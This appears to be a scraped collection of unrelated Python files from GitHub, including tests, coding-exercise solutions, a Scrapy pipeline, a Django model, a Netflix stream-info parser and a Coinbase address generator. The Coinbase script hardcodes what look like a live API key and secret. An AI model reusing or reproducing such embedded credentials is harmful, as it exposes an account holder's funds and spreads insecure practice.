'samples/input/json/george_resume_baseball.json',\n 'expected': {\n 'George Costanza': is_in,\n 'gcostanza@frankandestelle.net': is_removed,\n 'george@georgecostanza.com': is_in,\n 'Architectural design': is_removed,\n 'Sleeping under desk': is_in\n }\n },\n 'grandchild': {\n 'readfile': 'samples/input/json/george_resume_tv.json',\n 'expected': {\n 'George Costanza': is_in,\n 'Sleeping under desk': is_removed,\n 'Screenwriting': is_in\n }\n }\n}\nyaml_dict = {\n 'george_resume.yaml': deepcopy(test_dict['base']),\n 'george_resume_baseball.yaml': deepcopy(test_dict['child']),\n 'george_resume_tv.yaml': deepcopy(test_dict['grandchild'])\n}\n\n@pytest.fixture()\ndef json_files():\n return [REPO_ROOT / f['readfile'] for f in test_dict.values()]\n\n@pytest.fixture()\ndef yaml_files(json_files, tmp_path):\n result = []\n for json_path in json_files:\n file_ext_only = f\"{json_path.stem}.yaml\"\n yaml_dest_path = REPO_ROOT / \"build\" / f\"{json_path.stem}.html\"\n yaml_src_path = tmp_path / file_ext_only\n with json_path.open() as json_file:\n config = json.load(json_file)\n options = config['options']\n data = config.get('resume')\n options['output-html'] = str(yaml_dest_path)\n if 'parent-data' in options:\n options['parent-data'] = \\\n f\"{str(Path(options['parent-data']).stem)}.yaml\"\n with yaml_src_path.open('w+') as yaml_file:\n yaml.dump({'options': options, 'resume': data}, yaml_file)\n yaml_dict[file_ext_only]['readfile'] = yaml_src_path\n result.append(yaml_src_path)\n return result\n\n@pytest.fixture()\ndef load_jsons(json_files):\n return create_resumes(json_files)\n\n@pytest.fixture()\ndef load_yamls(yaml_files):\n return create_resumes(\n yaml_files, reader=lambda x : yaml.load(x, Loader = yaml.Loader))\n\nclass TestIntegrationBroad:\n \"\"\"No test doubles---full integration.\n \"\"\"\n @pytest.fixture(scope='class', autouse=True)\n def wipe_build_dir(self):\n repo_build_dir = Path(__file__).parent / 'build'\n if repo_build_dir.exists():\n shutil.rmtree(repo_build_dir)\n \n @pytest.mark.parametrize(\"name\", test_dict)\n def test_html(self, load_jsons, name):\n for value, exp_func in test_dict[name]['expected'].items():\n test_key = REPO_ROOT / test_dict[name]['readfile']\n with load_jsons[test_key].html_target.open() as f:\n html_string = f.read()\n assert exp_func(html_string, value)\n\n @pytest.mark.parametrize(\"name\", yaml_dict)\n def test_html_from_yaml(self, load_yamls, name):\n for value, exp_func in yaml_dict[name]['expected'].items():\n test_key = yaml_dict[name]['readfile']\n with load_yamls[test_key].html_target.open() as f:\n html_string = f.read()\n assert exp_func(html_string, value)\n","repo_name":"exvertus/dryresume","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7577808476","text":"def lonelyinteger(a):\n # Write your code here\n for number in a:\n if a.count(number)==1:\n return number\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().strip())\n\n a = list(map(int, input().rstrip().split()))\n\n result = lonelyinteger(a)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"kmb21/Hackerank","sub_path":"Python/Lonelyinteger.py","file_name":"Lonelyinteger.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"335464901","text":"class Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n '''\n red = list(\"0\" * (nums.count(0)))\n white = list(\"1\" * (nums.count(1)))\n blue = list(\"2\" * (nums.count(2)))\n total = red + white + blue\n total = [int(i) for i in total]\n \n for i in range(len(total)):\n nums[i] = total[i]\n return nums\n '''\n red = nums.count(0)\n white = nums.count(1)\n blue = nums.count(2)\n total = red + white + blue\n for i in range(total):\n if red >0:\n nums[i] = 0\n red -=1\n elif white > 0:\n nums[i] = 1\n white -=1\n elif blue > 0:\n nums[i] = 2\n blue -=1","repo_name":"wendy-wej/Solved-Leetcode-Questions","sub_path":"0075-sort-colors/0075-sort-colors.py","file_name":"0075-sort-colors.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71538857965","text":"import allure\nfrom evenbet_app_test_pywinauto.utils import return_func_name, mouse_input\nfrom evenbet_app_test_pywinauto.pages.BasePage import BasePage\n\n\ndef test_logout_from_left_menu(app, screenshot_report):\n \"\"\"Im this test we try to open left menu, choose 'Logout' tab, click 'Yes' button on logout dialog\n and find 'Login' button on main page.\"\"\"\n with allure.step(\"Initializing MyGamesPage.\"):\n page = BasePage(app=app)\n screenshot_report['window'] = app\n screenshot_report['file_name'] = return_func_name()\n with allure.step(\"Find left menu button.\"):\n left_menu_button = page.find_left_menu_button()\n assert left_menu_button, \"Left Menu button not found on main page.\"\n with allure.step(\"Click left menu button and find left menu tabs.\"):\n left_menu_button.click_input()\n left_menu_tabs = page.wait_for_left_menu_tabs(timeout=2)\n assert left_menu_tabs, \"Left menu tabs not found.\"\n with allure.step(\"Click 'Logout' (last) tab and wait for logout dialog with 'Yes' button.\"):\n left_menu_tabs[-1].click_input()\n logout_dialog_yes_btn = page.wait_for_logout_dialog_yes_button(timeout=2)\n assert logout_dialog_yes_btn, \"Logout form with 'Yes' button didn't appear after click 'Logout' left menu tab.\"\n with allure.step(\"Click 'Yes' button and wait for 'Login' button on main page.\"):\n logout_dialog_yes_btn.click_input()\n main_page_login_button = page.wait_for_main_page_login_button(timeout=5)\n assert main_page_login_button, \"Main page 'Login' button didn't appear after click 'Yes' \" \\\n \"button on logout dialog.\"\n mouse_input(main_page_login_button)\n screenshot_report['status'] = 'passed'\n","repo_name":"Dichmarck/evenbet_app_test_pywinauto","sub_path":"test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9469255078","text":"from coinbase.wallet.client import Client\nimport json\nimport time\napi_key = \"qllinMZsWKJxMbm1\"\nsecret_key = \"O8166FUvpXgZk5XowalRE8cP0tVXRWkT\"\n\n\ndef client_validation(key, secret):\n client = Client(key, secret)\n return client\n\n\ndef get_check_list(client):\n account = client.get_account('BTC')\n file = open('id.json', 'w')\n json.dump(account, file)\n file.close()\n file_1 = open('id.json', 'r')\n btc = json.load(file_1)\n file.close()\n checklist = [btc['id'], btc['currency'], btc['balance']['amount'], btc['primary'], btc['allow_withdrawals'],\n btc['native_balance']]\n\n return checklist\n\n\ndef create_address(btc_id, client):\n address = client.create_address(btc_id)\n return address\n\n\ndef address_record(add):\n file_a = open('addresses_record2.json', 'r')\n\n record_list = json.load(file_a)\n file_a.close()\n record_list.append(add)\n file_update = open('addresses_record2.json', 'w')\n json.dump(record_list, file_update)\n file_update.close()\n\n\ndef address_record_2(add):\n file_b = open('addresses.json', 'r')\n record_list = json.load(file_b)\n file_b.close()\n new_record = {'address': add[0], 'date_created': add[1]}\n record_list.append(new_record)\n file_update = open('addresses.json', 'w')\n json.dump(record_list, file_update)\n file_update.close()\n\n\ndef address_read(add):\n file_c = open('address_parser.json', 'w')\n json.dump(add, file_c)\n file_c.close()\n file_p = open('address_parser.json', 'r')\n adrss = json.load(file_p)\n file_p.close()\n address = adrss['address']\n date= adrss['created_at']\n return [address, date]\n\n\ndef run():\n time.sleep(1)\n c_valid = client_validation(api_key, secret_key)\n check_list = get_check_list(c_valid)\n btc_address = create_address(check_list[0], c_valid)\n main_address = address_read(btc_address)\n address_record_2(main_address)\n address_record(btc_address)\n print('address')\n return main_address[0]\n\n\n\n","repo_name":"bruteforcerxx/axemo-","sub_path":"COINBASE_ADDRESS_GENERATOR.py","file_name":"COINBASE_ADDRESS_GENERATOR.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15876270005","text":"import requests\nimport os\n# Import WebClient from Python SDK (github.com/slackapi/python-slack-sdk)\nfrom slack_sdk import WebClient\nfrom slack_sdk.errors import SlackApiError\n\nindexArray = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14']\nisCorrect = False\n\ndef handler(pd: \"pipedream\"):\n # variables declared for use in next workflow\n global count\n global isCorrect\n global timeStamp\n user = pd.steps[\"trigger\"][\"event\"][\"user\"]\n timeStamp = pd.steps[\"trigger\"][\"event\"][\"thread_ts\"]\n text = pd.steps[\"trigger\"][\"event\"][\"text\"]\n \n #slack API token\n TOKEN = pd.inputs[\"slack\"][\"$auth\"][\"oauth_access_token\"]\n authorization = f'Bearer {TOKEN}'\n headers = {\"Authorization\": authorization}\n r = requests.get('https://slack.com/api/users.profile.get', headers=headers)\n \n for i in indexArray:\n if text == i:\n isCorrect = True\n break\n \n return text,isCorrect,user,timeStamp\n","repo_name":"Yuyichn01/SlackBot-1","sub_path":"pipedream_check_input_number.py","file_name":"pipedream_check_input_number.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"24556036599","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport pymongo\nimport codecs\n# from datetime import date\nimport datetime\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass KaolaPipeline(object):\n # save to mongo\n def __init__(self):\n self.con = pymongo.MongoClient('10.214.224.142',20000)\n self.db = self.con.onlineshop\n self.goods = self.db[\"kaolaGoods\"]\n self.update_time = datetime.datetime.utcnow()\n \n self.db_sina = self.con.Sina_Distributed\n self.brand = self.db_sina[\"brand_information\"]\n self.brand_info = {}\n for i in self.brand.find({},{\"brand_name\":1}):\n self.brand_info[ i['brand_name'].lower() ] = i['_id']\n\n def process_item(self, item, spider):\n brand_name = re.search('(\\w+)(-)?(\\w+)',item['brand_name']).group().lower()\n item['brand_id'] = self.brand_info[brand_name]\n if 'people_aimed' not in item:\n item['people_aimed'] = u\"\"\n if 'product_type' not in item:\n item['product_type'] = u\"\"\n item['data_sourse'] = u\"考拉\"\n # item['update_time'] = date.today().isoformat()\n item['update_time'] = self.update_time\n self.goods.insert( dict(item) )\n return item\n\n \n # save to data.json\n # def __init__(self):\n # self.file=codecs.open(\"data.json\",\"wb\",\"utf-8\")\n\n # def process_item(self, item, spider):\n # line = json.dumps( dict(item), ensure_ascii=False )+'\\n'\n # self.file.write(line)\n # return item\n","repo_name":"joffreZju/pycode","sub_path":"kaola/kaola/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13052598606","text":"# -*- coding: utf-8 -*-\n\nimport datetime, json, logging, os, pprint\n\nfrom .lib.scorer import Scorer\nfrom django.conf import settings as project_settings\nfrom django.core import serializers\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\nfrom django.http import HttpResponseRedirect\nfrom django.utils import timezone\n\n\nlog = logging.getLogger(__name__)\nscrr = Scorer()\n\n\nclass Tracker(models.Model):\n\n STANDARD_CHOICES = (\n ('yes', 'yes'), # ( db-value, appearance-value )\n ('no', 'no'),\n ('n/a', 'not-applicable'),\n )\n\n created = models.DateTimeField( auto_now_add=True )\n modified = models.DateTimeField( auto_now=True )\n\n # ================================================\n # will be publicly viewable\n # ================================================\n\n project_name = models.CharField( max_length=50 )\n slug = models.SlugField( help_text='for identifying segment in url; auto-entered, but feel free to edit' )\n project_contact_email = models.EmailField()\n\n code_versioned = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n has_public_code_url = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n public_code_url = models.URLField(\n max_length=200,\n blank=True\n )\n\n responsive = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='looks/works right on desktop & mobile-devices'\n )\n\n contains_lightweight_data_reporting = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n accessibility_check_run = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n verbose_name='is accessible',\n help_text='start suggestion: no \"wave\" errors on first and second-level pages'\n )\n\n data_discoverable = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='information accessible by discovery-application'\n )\n\n has_sitechecker_entry = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n\n # ================================================\n # everything below (to bottom of file) _not_ publicly viewable\n # ================================================\n\n ## dates for publicly viewable options\n\n project_contact_email_CHECKED = models.DateField( blank=True, null=True )\n\n code_versioned_CHECKED = models.DateField( blank=True, null=True )\n has_public_code_url_CHECKED = models.DateField(\n help_text=\"check-date for the drop-down menu for whether there _is_ a public url to code\",\n blank=True,\n null=True\n )\n public_code_url_CHECKED = models.DateField(\n help_text=\"check-date for the _accuracy_ of the public url entered\",\n blank=True,\n null=True\n )\n responsiveness_CHECKED = models.DateField( blank=True, null=True )\n contains_lightweight_data_reporting_CHECKED = models.DateField( blank=True, null=True )\n accessibility_check_run_CHECKED = models.DateField( blank=True, null=True )\n data_discoverable_CHECKED = models.DateField( blank=True, null=True )\n has_sitechecker_entry_CHECKED = models.DateField( blank=True, null=True )\n\n ##################################################\n ## security\n ##################################################\n\n framework_supported = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='uses a supported long-term-release'\n )\n framework_supported_CHECKED = models.DateField( blank=True, null=True )\n\n https_enforced = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n https_enforced_CHECKED = models.DateField( blank=True, null=True )\n\n admin_links_shib_protected = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n admin_links_shib_protected_CHECKED = models.DateField( blank=True, null=True )\n\n logs_rotated = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n )\n logs_rotated_CHECKED = models.DateField( blank=True, null=True )\n\n patron_data_expiration_process = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text='if patron data is captured, there is an implemented process for identifying info to be deleted'\n )\n patron_data_expiration_process_CHECKED = models.DateField( blank=True, null=True )\n\n django_session_data_expired = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"if django session-data is stored in db, it's auto-deleted via cron\"\n )\n django_session_data_expired_CHECKED = models.DateField( blank=True, null=True )\n\n emails_admin_on_error = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"\"\n )\n emails_admin_on_error_CHECKED = models.DateField( blank=True, null=True )\n\n vulnerabilities_fixed = models.CharField(\n max_length=20,\n choices=STANDARD_CHOICES,\n default='no',\n help_text=\"github `potential security vulnerabilities` fixed\"\n )\n vulnerabilities_fixed_CHECKED = models.DateField( blank=True, null=True )\n\n ### other ###\n\n notes = models.TextField( null=True, blank=True )\n\n score = models.IntegerField( null=True, blank=True, help_text=\"auto-calculated, not editable\" )\n\n def save(self, *args, **kwargs):\n self.score = scrr.calc_score( self )\n super(Tracker, self).save()\n\n def __unicode__(self):\n return self.project_name\n\n def jsonize( self ):\n jsn = serializers.serialize( 'json', self ) # data = serializers.serialize(\"json\", YourModel.objects.all())\n jsn_dct = json.loads( jsn )\n return jsn_dct\n\n\n ## end class Tracker()\n","repo_name":"Brown-University-Library/bul_cbp_project","sub_path":"bul_cbp_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8222531535","text":"import json\nclass NetFlixMessageProcessor():\n def __init__(self,data,track_info):\n self.data = data\n self.track_info = track_info\n\n def get_videoinfo_by_quality(self,quality,bitrate=0):\n result = self.track_info['result']\n video_track = result[\"video_tracks\"][0]\n streams = video_track[\"streams\"]\n\n filter_s = []\n for s in streams:\n if quality <= s['crop_h']:\n filter_s.append(s)\n if len(filter_s) == 0:\n filter_s.append(streams[-1])\n taget_s = filter_s[-1]\n for s in filter_s:\n if bitrate <= s['bitrate']:\n taget_s = s\n break\n\n return {\"url\":taget_s[\"urls\"][0][\"url\"],\n \"height\":taget_s[\"crop_h\"],\n \"width\":taget_s[\"crop_w\"],\n \"keyid\":taget_s[\"drmHeaderId\"],\n \"bitrate\":taget_s[\"bitrate\"]\n }\n\n def get_audioinfo_by_lan(self,lan=\"en\",languageDescription=\"\",channels=\"\"):\n result = self.track_info['result']\n audio_tracks = result[\"audio_tracks\"]\n target_a = audio_tracks[0]\n for audio in audio_tracks:\n if audio[\"language\"] == lan:\n target_a = audio\n if languageDescription == audio[\"languageDescription\"] and channels==audio[\"channels\"]:\n break\n height_s = target_a[\"streams\"][-1]\n return {\n \"url\": height_s[\"urls\"][0][\"url\"],\n \"language\":target_a[\"language\"],\n \"languageDescription\":target_a[\"languageDescription\"],\n \"channels\":target_a[\"channels\"],\n \"bitrate\": height_s[\"bitrate\"]\n }\n def get_subtitleinfo_by_lan(self,lan=\"en\",languageDescription=\"\"):\n result = self.track_info['result']\n timedtexttracks = result[\"timedtexttracks\"]\n target_s = timedtexttracks[0]\n for subtitle in timedtexttracks:\n if subtitle[\"language\"] == lan:\n target_s = subtitle\n if languageDescription == subtitle[\"languageDescription\"]:\n break\n ttDownloadables = target_s[\"ttDownloadables\"]\n simplesdh = list(ttDownloadables.values())[0]\n downloadUrls = simplesdh[\"downloadUrls\"]\n url = list(downloadUrls.values())[0]\n return {\n \"url\": url,\n \"language\":target_s[\"language\"],\n \"languageDescription\":target_s[\"languageDescription\"]\n }\n def get_title(self):\n video = self.data[\"video\"]\n return video[\"title\"]\n\nif __name__ == \"__main__\":\n with open(\"track_info\",\"r\") as fp:\n track_info = json.loads(fp.read())\n with open(\"data\",\"r\") as fp:\n data = json.loads(fp.read())\n messager = NetFlixMessageProcessor(data,track_info)\n video_info = messager.get_videoinfo_by_quality(1080)\n audio_info = messager.get_audioinfo_by_lan(\"en\")\n subtitle_info = messager.get_subtitleinfo_by_lan(\"zh-Hans\")\n title = messager.get_title()\n print(video_info)\n print(audio_info)\n print(subtitle_info)\n print(title)","repo_name":"2963663242/Folder_online","sub_path":"noteBurner/meidia_convert/netFlixMessageProcessor.py","file_name":"netFlixMessageProcessor.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"71043395248","text":"import sys\nimport time\n\ntags = set()\nobservations = set()\n\ndef loadTrainData(filepath):\n\t#\n\t#\tLoad data from training corpus (POS-Tagged)\n\t#\tThe/DT third/JJ was/VBD being/VBG run/VBN by/IN the/DT head/NN of/IN an/DT investment/NN firm/NN ./.\n\t#\n\t#print(\"Loading training corpus...(\"+str(filepath)+\")\\n\")\n\twith open(filepath) as trainFile:\n\t\tdata = trainFile.read()\n\treturn data\n\ndef prepareData(data):\n\t#\n\t#\tPrepare corpus for training\n\t#\tSplit data into sentences\n\t#\n\tsentences = data.strip().split('\\n')\n\t#sentences = ['$STRT#/q0 ' + str(s) + ' $END#/qF' for s in sentences ]\n\tsentences = ['$STRT#/q0 ' + str(s) + ' $END#/qF' for s in sentences ]\n\treturn sentences\n\ndef learnTransitions(sentences):\n\t#\n\t#\tLearn A, transition matrix from corpus\n\t#\t\n\t#\n\n\t#Initialize dicts for total tag occurence count, tag1-to-tag2 transition\n\ttagCount = {}\n\ttagTransitionDict = {}\n\tglobal tags\n\t#Tokenize in words\n\tfor s in sentences:\n\t\t#print(s)\n\t\t#input('...')\n\t\twordTagPairs = s.split(' ')\n\t\twTP_count = len(wordTagPairs)\n\t\tfor k in range((wTP_count-1)):\n\t\t\t#print('\\t'+ wordTagPairs[k] + ' ' + str(k))\n\t\t\tcurr_wT = wordTagPairs[k]\n\t\t\tcurrTag = curr_wT.rsplit('/',1)[1]\n\t\t\t\n\t\t\tnext_wT = wordTagPairs[k+1]\n\t\t\tnextTag = next_wT.rsplit('/',1)[1]\n\n\t\t\ttags.add(str(currTag))\n\t\t\ttags.add(str(nextTag))\t\n\t\t\ttagCount[currTag] = tagCount.get(currTag,0) + 1\n\t\t\ttagTransitionDict[(currTag, nextTag)] = tagTransitionDict.get((currTag,nextTag),0) + 1\n\n\t#IF-DEBUG\n\t#for x in tagCount.keys():\n\t\t#print(str(x)+'\\n')\n\t#for x in tagTransitionDict.keys():\n\t#\tprint(str(x)+'='+str(tagTransitionDict.get(x))+'\\n')\n\t#print(\"Total Tags: \" + str(len(tagCount.keys())))\n\treturn tagCount,tagTransitionDict\n\ndef learnEmissions(sentences):\n\t#\n\t#\tLearn A, transition matrix from corpus\n\t#\t\n\t#\n\n\t#Initialize dicts for total tag occurence count, tag1-to-tag2 transition\n\ttagWordEmitDict = {}\n\ttagCount = {}\n\tglobal observations\n\t#Tokenize in words\n\tfor s in sentences:\n\t\t#print(s)\n\t\t#input('...')\n\t\twordTagPairs = s.split(' ')\n\t\twTP_count = len(wordTagPairs)\n\t\tfor k in range(1,wTP_count):\n\t\t\t#print('\\t'+ wordTagPairs[k] + ' ' + str(k))\n\t\t\tcurr_wT = wordTagPairs[k]\n\t\t\tcurrWord = curr_wT.rsplit('/',1)[0]\n\t\t\tcurrTag = curr_wT.rsplit('/',1)[1]\n\n\t\t\tobservations.add(str(currWord))\n\t\t\ttagCount[currTag] = tagCount.get(currTag,0) + 1\n\t\t\ttagWordEmitDict[(currTag, currWord)] = tagWordEmitDict.get((currTag, currWord),0) + 1\n\n\t#IF-DEBUG\n\t#for x in tagWordEmitDict.keys():\n\t\t#print(str(x)+'='+str(tagWordEmitDict.get(x))+'/'+str(tagCount.get(x[0]))+'\\n')\n\treturn tagCount,tagWordEmitDict\n\ndef saveModelParams(tagCountA,transitionDict,tagCountB, tagWordEmitDict):\n\tts = time.gmtime()\n\tmodel = ''\n\tmodel += 'HMM Model File - '+str(time.strftime(\"%Y-%m-%d %H:%M:%S\", ts))\n\tmodel += '\\n---Tags---\\n'\n\tmodel += str(len(tags)) + '\\n'\n\tfor t in tags:\n\t\tmodel += t+'\\n'\t\t\n\tmodel = model.strip('\\n')\n\tmodel += '\\n---Observations---\\n'\n\tmodel += str(len(observations)) + '\\n'\n\tfor o in observations:\n\t\tmodel += o +'\\n'\n\tmodel = model.strip('\\n')\n\tmodel += '\\n---Transition Probablities---\\n'\n\ttransProbs = ''\n\ttransProbsCount = 0\n\tfor t in tags:\n\t\tdenominator = tagCountA['q0']\n\t\tif denominator == 0:\n\t\t\tdenominator = 1\n\t\tnumerator = transitionDict.get(('q0',t),0)\n\t\tif numerator > 0:\t\n\t\t\ttransProbs += 'q0 ' + str(t) + ' ' + str(float(numerator/denominator)) + '\\n'\n\t\t\t#transProbs += 'q0 ' + str(t) + ' ' + str(float(numerator)) + ' ' + str(denominator) + '\\n'\n\t\t\ttransProbsCount += 1\n\tfor t1 in tags:\n\t\tif not str(t1) == 'q0':\n\t\t\tfor t2 in tags:\n\t\t\t\tdenominator = tagCountA.get(t1,0)\n\t\t\t\tif denominator == 0:\n\t\t\t\t\tdenominator = 1\n\t\t\t\tnumerator = transitionDict.get((t1,t2),0)\n\t\t\t\tif numerator > 0:\t\n\t\t\t\t\ttransProbs += str(t1) + ' ' + str(t2) + ' ' + str(float(numerator/denominator)) + '\\n'\n\t\t\t\t\t#transProbs += str(t1) + ' ' + str(t2) + ' ' + str(float(numerator)) + ' ' + str(denominator) + '\\n'\t\n\t\t\t\t\ttransProbsCount += 1\n\tmodel += str(transProbsCount) + '\\n'\n\tmodel += transProbs\n\tmodel = model.strip('\\n')\n\tmodel += '\\n--Emission Probablities---\\n'\n\temissProbs = ''\n\temissProbsCount = 0\n\tfor t in tags:\n\t\tfor o in observations:\n\t\t\tdenominator = tagCountB.get(t,0)\n\t\t\tif denominator == 0:\n\t\t\t\tdenominator = 1\n\t\t\tnumerator = tagWordEmitDict.get((t,o),0)\n\t\t\tif numerator > 0:\t\n\t\t\t\temissProbs += str(t) + ' ' + str(o) + ' ' + str(float(tagWordEmitDict.get((t,o),0)/denominator)) + '\\n'\n\t\t\t\t#emissProbs += str(t) + ' ' + str(o) + ' ' + str(float(tagWordEmitDict.get((t,o),0))) + ' ' + str(denominator) + '\\n'\n\t\t\t\temissProbsCount += 1\n\tmodel += str(emissProbsCount) + '\\n'\n\tmodel += emissProbs\n\tmodel = model.strip('\\n')\n\twith open(\"hmmmodel.txt\", \"w+\") as f:\n\t\tf.write(model)\n\ndef main():\n\ttrainFilePath = sys.argv[1]\n\tcorpus = loadTrainData(trainFilePath)\n\tsentences = prepareData(corpus)\t\n\ttagCountA,tagTransitionDict = learnTransitions(sentences)\n\ttagCountB,tagWordEmitDict = learnEmissions(sentences)\n\t#Check if both are same.\n\t#for x in tagCountA.keys():\n\t\t#print(str(x) +'-'+ str(tagCountA.get(x,0))+'-'+str(tagCountB.get(x,0)))\n\t#print(tagCountA.keys())\n\tsaveModelParams(tagCountA,tagTransitionDict,tagCountB,tagWordEmitDict)\n\t\nif __name__ == '__main__':\n main()","repo_name":"arshd91/Hmm-ViterbiDecode","sub_path":"hmmlearn3.py","file_name":"hmmlearn3.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"72266964846","text":"import re\nwith open(\"./Day 7/d7_input.txt\") as f:\n inputs = f.readlines()\n\n\ndef part1():\n root = Tree(\"/\")\n total_size = 0\n\n for i, input in enumerate(inputs):\n input = input.strip()\n\n if input[:7] == \"$ cd ..\":\n handle_move_out()\n elif input[:4] == \"$ cd\":\n name = input.split(\"$ cd \")[1]\n handle_move_in(name, root, i)\n elif input[:4] == \"$ ls\":\n handle_list()\n\n return print(total_size)\n\n\ndef handle_move_in(name, root, i):\n size = get_size(i)\n root.add_child(name, size)\n return\n\n\ndef handle_move_out():\n return\n\n\ndef handle_list():\n return\n\ndef get_size(i):\n i += 1\n size = 0\n\n while i < len(inputs) and inputs[i][:4] != \"$ cd\":\n if inputs[i][0].isnumeric():\n size += int(re.findall('\\d+', inputs[i])[0])\n i += 1\n return size\n\n\nclass Tree(object):\n def __init__(self, name='root', size=0, children=None):\n self.name = name\n self.size = size\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def __repr__(self):\n return self.name\n\n def add_child(self, node):\n assert isinstance(node, Tree)\n self.children.append(node)\n\n\npart1()\n","repo_name":"j206/advent-of-code-2022","sub_path":"Day 07/d7_part1_recursive.py","file_name":"d7_part1_recursive.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36852128908","text":"import cv2\r\n\r\n\r\n\r\nface_detector=cv2.CascadeClassifier(cv2.data.haarcascades+'haarcascade_frontalface_default.xml')\r\n\r\n\r\ncap=cv2.VideoCapture(0)\r\ncount=0\r\n\r\n\r\n\r\ndef face_extract(frame):\r\n gray_img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n face_lens = face_detector.detectMultiScale(gray_img, scaleFactor=1.3, minNeighbors=5)\r\n\r\n if len(face_lens)==0:\r\n return None\r\n\r\n for (x, y, w, h) in face_lens:\r\n x,y = (x - 10, y - 10)\r\n face = frame[y:y + h + 50, x:x + w + 50]\r\n\r\n return face\r\n\r\n\r\nwhile True:\r\n res, frame = cap.read()\r\n if face_extract(frame) is None:\r\n print('face not found')\r\n pass\r\n else:\r\n count=count+1\r\n face=cv2.resize(face_extract(frame),(400,400))\r\n\r\n file_path='./Images/test/'+str(count)+'.jpg'\r\n cv2.imwrite(file_path,face)\r\n\r\n cv2.putText(face,str(count),(50,50),cv2.FONT_HERSHEY_COMPLEX,1,(0,255,0),2)\r\n cv2.imshow('face',face)\r\n\r\n if cv2.waitKey(1)==13 or count==100:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\nprint(\"Done\")\r\n","repo_name":"RaguTeja/MaskDetection_AlertSystem","sub_path":"MASK_DETECTION/Capture_RealTime_Faces.py","file_name":"Capture_RealTime_Faces.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11228603670","text":"\nclass FullName:\n\n def __init__(self,name='mehedi',age = 30):\n self.name = name\n self.age = age\n\n def compare(self,other_object):\n\n if self.age == other_object.age:\n return True\n else:\n return False\n\nobj1 = FullName() #obj1 automatically call __init__ . init take obj1 by self parameter automatically\nobj2 = FullName() # same as obj1\n\nobj1.age = 20\nobj2.age = 20\n\nif obj1.compare(obj2): #obj1 object pass as a parameter by compare's self parameter and obj2 pass by compare method's other_parameter\n print('age are same')\nelse:\n print('Age Not same')\n\n\n\n","repo_name":"Mehedi-Bin-Hafiz/Python-OOP","sub_path":"classes/constructor_and_self.py","file_name":"constructor_and_self.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"15501211454","text":"from diffusers import UniPCMultistepScheduler, DDIMScheduler\r\nimport diffusers\r\nfrom diffusers import StableDiffusionControlNetPipeline, ControlNetModel\r\nfrom transformers import CLIPTextModel, CLIPTokenizer\r\nimport random\r\nimport torch\r\nimport os\r\nfrom diffusers import StableDiffusionPipeline, DPMSolverMultistepScheduler, DDIMScheduler, AutoencoderKL, UNet2DConditionModel\r\nfrom transformers import 